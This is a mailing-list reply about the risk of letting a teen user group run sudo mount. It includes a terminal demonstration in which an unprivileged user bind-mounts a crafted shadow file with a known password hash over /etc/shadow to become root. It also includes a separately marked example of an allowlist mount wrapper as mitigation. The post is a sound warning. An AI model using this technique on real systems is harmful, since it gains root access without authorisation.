
Re: Giving remaja (teens) group full administrator privileges through sudo - dangerous?



Hello,

On Sat, Jun 22, 2019 at 04:44:40PM -0700, Jimmy Johnson wrote:
> Someone mentioned mounting drives, all that and what they need can be
> configured.

Also note that anyone who can use "mount" as root can trivially become
root. If countenancing allowing users to run "mount" as root I would
make scripts that only mounted the exact things to the exact places,
and then let them run those scripts as root.

andy@debtest1:~$ su - bob
Password: 
bob@debtest1:~$ whoami
bob
bob@debtest1:~$ sudo -i
[sudo] password for bob: 
Sorry, user bob is not allowed to execute '/bin/bash' as root on debtest1.vps.bitfolk.com.
bob@debtest1:~$ echo 'bob:$6$K6b1uzg.$pTNKJG/9hIgnhBL53Y2mr0rrsBBZE1xDWE0bO8E94dBlM.itel4/meJTZYL12IIOZ9ck/3P2/j5XGbyKcKxFK/:18070:0:99999:7:::' > myshadow
bob@debtest1:~$ sudo mount --bind ./myshadow /etc/shadow
bob@debtest1:~$ su -
Password: 
root@debtest1:~# whoami
root

The password of that hash is "letmein1".

So don't give anyone sudo access to /bin/mount unless you are okay
with them being able to become root proper if they really want to.

Cheers,
Andy
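
The mitigation recommended in the message above (scripts that mount only the exact things to the exact places), as an added example that is not part of the original post. The script path, the allowlist entries and the filesystem labels are assumptions; the group name is taken from the thread subject.

```shell
#!/bin/sh
# mount-allowed: added example, not code from the original post.
# Install root-owned and not writable by users, e.g. at the hypothetical
# path /usr/local/sbin/mount-allowed, and grant only this wrapper in
# sudoers instead of /bin/mount:
#   %remaja ALL=(root) /usr/local/sbin/mount-allowed

# Constructed allowlist, one entry per line: name|device|mountpoint|options.
# nosuid,nodev: files on user-supplied media must not carry setuid bits
# or device nodes.
ALLOWED_MOUNTS='usbstick|/dev/disk/by-label/TEENS_USB|/media/teens-usb|nosuid,nodev,noexec
archive|/dev/disk/by-label/ARCHIVE|/media/archive|ro,nosuid,nodev,noexec'

# Look up a name in the allowlist. On success set MNT_DEV, MNT_DIR and
# MNT_OPTS and return 0; on any other input return non-zero.
lookup_mount() {
    MNT_DEV='' MNT_DIR='' MNT_OPTS=''
    case $1 in
        ''|*[!a-z0-9]*) return 1 ;;  # short names only: no paths, no options
    esac
    entry=$(printf '%s\n' "$ALLOWED_MOUNTS" | grep "^$1|") || return 1
    IFS='|' read -r _name MNT_DEV MNT_DIR MNT_OPTS <<EOF
$entry
EOF
}

# Act only when called with an argument, so the file can also be sourced.
if [ "$#" -gt 0 ]; then
    PATH=/usr/sbin:/usr/bin:/sbin:/bin
    export PATH
    if [ "$#" -ne 1 ] || ! lookup_mount "$1"; then
        echo "usage: mount-allowed {usbstick|archive}" >&2
        exit 2
    fi
    # The caller chooses only the name; device, mountpoint and options
    # all come from the table above.
    exec /bin/mount -o "$MNT_OPTS" "$MNT_DEV" "$MNT_DIR"
fi
```

Because the caller supplies nothing but an allowlisted name, requests such as `--bind` or an arbitrary source and target path are refused before mount is ever invoked.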

